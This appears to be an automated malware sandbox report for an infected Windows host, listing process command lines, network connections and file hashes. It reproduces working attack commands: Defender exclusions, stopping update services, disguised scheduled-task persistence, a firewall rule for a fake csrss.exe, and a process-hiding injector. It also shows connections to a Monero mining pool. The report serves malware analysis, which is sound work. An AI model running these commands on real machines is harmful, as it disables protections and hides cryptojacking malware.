"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16765038933789164313,16962189603449218242,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9333d46f8,0x7ff9333d4708,0x7ff9333d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16765038933789164313,16962189603449218242,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16765038933789164313,16962189603449218242,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4420 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\22B0.exe

C:\Users\Admin\AppData\Local\Temp\22B0.exe

C:\Users\Admin\AppData\Local\Temp\285E.exe

C:\Users\Admin\AppData\Local\Temp\285E.exe

C:\Users\Admin\AppData\Local\Temp\292A.exe

C:\Users\Admin\AppData\Local\Temp\292A.exe

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,16765038933789164313,16962189603449218242,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5800 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,16765038933789164313,16962189603449218242,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5800 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=EDD1.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

C:\Users\Admin\AppData\Local\Temp\3282.exe

C:\Users\Admin\AppData\Local\Temp\3282.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16765038933789164313,16962189603449218242,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16765038933789164313,16962189603449218242,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9333d46f8,0x7ff9333d4708,0x7ff9333d4718

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16765038933789164313,16962189603449218242,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16765038933789164313,16962189603449218242,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6360 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16765038933789164313,16962189603449218242,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16765038933789164313,16962189603449218242,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=EDD1.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9333d46f8,0x7ff9333d4708,0x7ff9333d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16765038933789164313,16962189603449218242,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6620 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16765038933789164313,16962189603449218242,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6680 /prefetch:1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 121.208.253.8.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.52:80 77.91.68.52 tcp
RU 5.42.92.88:80 5.42.92.88 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 52.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 88.92.42.5.in-addr.arpa udp
TR 185.216.70.222:80 185.216.70.222 tcp
US 8.8.8.8:53 222.70.216.185.in-addr.arpa udp
BG 171.22.28.213:80 171.22.28.213 tcp
US 8.8.8.8:53 213.28.22.171.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
IT 185.196.9.65:80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
NL 85.209.176.128:80 tcp
US 8.8.8.8:53 65.9.196.185.in-addr.arpa udp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 www.facebook.com udp
NL 157.240.247.35:443 www.facebook.com tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 api.ip.sb udp
US 172.67.75.172:443 api.ip.sb tcp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 126.178.238.8.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 10.5.240.157.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.71:4341 tcp
US 8.8.8.8:53 71.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 learn.microsoft.com udp
NL 104.85.2.139:443 learn.microsoft.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 hellouts.fun udp
US 188.114.97.0:80 hellouts.fun tcp
US 8.8.8.8:53 59.82.57.23.in-addr.arpa udp
US 8.8.8.8:53 139.2.85.104.in-addr.arpa udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 188.114.97.0:80 hellouts.fun tcp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 8.8.8.8:53 js.monitor.azure.com udp
US 13.107.246.67:443 js.monitor.azure.com tcp
US 13.107.246.67:443 js.monitor.azure.com tcp
US 8.8.8.8:53 mscom.demdex.net udp
US 8.8.8.8:53 target.microsoft.com udp
US 8.8.8.8:53 microsoftmscompoc.tt.omtrdc.net udp
IE 52.17.210.114:443 mscom.demdex.net tcp
US 8.8.8.8:53 67.246.107.13.in-addr.arpa udp
US 8.8.8.8:53 114.210.17.52.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 8.8.8.8:53 h2o.activebuy.top udp
MD 37.221.65.143:8443 h2o.activebuy.top tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 8.8.8.8:53 143.65.221.37.in-addr.arpa udp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 8.8.8.8:53 browser.events.data.microsoft.com udp
US 52.168.112.67:443 browser.events.data.microsoft.com tcp
US 52.168.112.67:443 browser.events.data.microsoft.com tcp
US 52.168.112.67:443 browser.events.data.microsoft.com tcp
US 8.8.8.8:53 67.112.168.52.in-addr.arpa udp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
FI 77.91.124.55:19071 tcp
US 188.114.97.0:80 hellouts.fun tcp
NL 85.209.176.128:80 tcp
US 188.114.97.0:80 hellouts.fun tcp
FI 77.91.124.55:19071 tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 8.8.8.8:53 126.210.247.8.in-addr.arpa udp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
NL 194.169.175.127:80 host-host-file8.com tcp
US 8.8.8.8:53 127.175.169.194.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 926383f7-1e9d-4773-a454-ec9dadaf738c.uuid.realupdate.ru udp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
NL 85.209.176.128:80 tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 1.202.248.87.in-addr.arpa udp
US 8.8.8.8:53 server14.realupdate.ru udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun3.l.google.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
SG 74.125.24.127:19302 stun3.l.google.com udp
BG 185.82.216.96:443 server14.realupdate.ru tcp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.96.0:443 walkinglate.com tcp
US 8.8.8.8:53 127.24.125.74.in-addr.arpa udp
US 8.8.8.8:53 96.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
BG 185.82.216.96:443 server14.realupdate.ru tcp
FI 77.91.124.55:19071 tcp
NL 85.209.176.128:80 tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 51.15.193.130:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
DE 135.125.238.108:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 130.193.15.51.in-addr.arpa udp
US 8.8.8.8:53 108.238.125.135.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
NL 85.209.176.128:80 tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 server14.realupdate.ru udp
BG 185.82.216.96:443 server14.realupdate.ru tcp

Files

memory/4116-0-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4116-1-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4116-3-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3172-2-0x0000000008330000-0x0000000008346000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\E5AD.exe

MD5 9116658f4e155e7a053cc0e0f9fc1aed
SHA1 ae52cef85d21c96b90d61b9ccf66cc6da52bb9da
SHA256 4a26a8c09c779f06c5aea4c99693a041583e2c1ebcfe339412aeecdda6946243
SHA512 8fcc39f72e71482c966019ff6adc050c6547507f814994062fdb26109f2c7fe82748528d4414cea4328a14fa1f3a8c4b4bf3529707e05b358b016fdb19548d5f

C:\Users\Admin\AppData\Local\Temp\E5AD.exe

MD5 9116658f4e155e7a053cc0e0f9fc1aed
SHA1 ae52cef85d21c96b90d61b9ccf66cc6da52bb9da
SHA256 4a26a8c09c779f06c5aea4c99693a041583e2c1ebcfe339412aeecdda6946243
SHA512 8fcc39f72e71482c966019ff6adc050c6547507f814994062fdb26109f2c7fe82748528d4414cea4328a14fa1f3a8c4b4bf3529707e05b358b016fdb19548d5f

C:\Users\Admin\AppData\Local\Temp\E6B7.exe

MD5 53e28e07671d832a65fbfe3aa38b6678
SHA1 6f9ea0ed8109030511c2c09c848f66bd0d16d1e1
SHA256 5c59db3277aefb761d4b814aaf5f5acd1fd1a0ea154dc565c78b082a3df4566e
SHA512 053f8048230583e741c34f6714c9684ed1312c064cd0c81d99f09e20192b7ddecb53c9c55e4aceac774315315be7e13de98f2cea4e5487f2d9e9dfa2ce3979c9

C:\Users\Admin\AppData\Local\Temp\E6B7.exe

MD5 53e28e07671d832a65fbfe3aa38b6678
SHA1 6f9ea0ed8109030511c2c09c848f66bd0d16d1e1
SHA256 5c59db3277aefb761d4b814aaf5f5acd1fd1a0ea154dc565c78b082a3df4566e
SHA512 053f8048230583e741c34f6714c9684ed1312c064cd0c81d99f09e20192b7ddecb53c9c55e4aceac774315315be7e13de98f2cea4e5487f2d9e9dfa2ce3979c9

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe

MD5 ab812ed81d5bcda424814481ddbfd16c
SHA1 4d9ffd7aedb4f67922c5d31b8904ec8bfedad281
SHA256 d27388deee0b758f62721895e752b3b6ebc624b258da4525ab98823774c4e7fa
SHA512 6a6eac5b1910acc8603fbc5514b7ee4239036b84200de7f23d4b483076f26587b5625b93651674a2ae9c3ead342c283ce6f1edf34a9bddb8b210fd97dadeb91e

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe

MD5 ab812ed81d5bcda424814481ddbfd16c
SHA1 4d9ffd7aedb4f67922c5d31b8904ec8bfedad281
SHA256 d27388deee0b758f62721895e752b3b6ebc624b258da4525ab98823774c4e7fa
SHA512 6a6eac5b1910acc8603fbc5514b7ee4239036b84200de7f23d4b483076f26587b5625b93651674a2ae9c3ead342c283ce6f1edf34a9bddb8b210fd97dadeb91e

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe

MD5 b73d0f04343d9b5127606a3fc98cb171
SHA1 75cf2d811bc27fdb2a628345cc3b2e78b6522a60
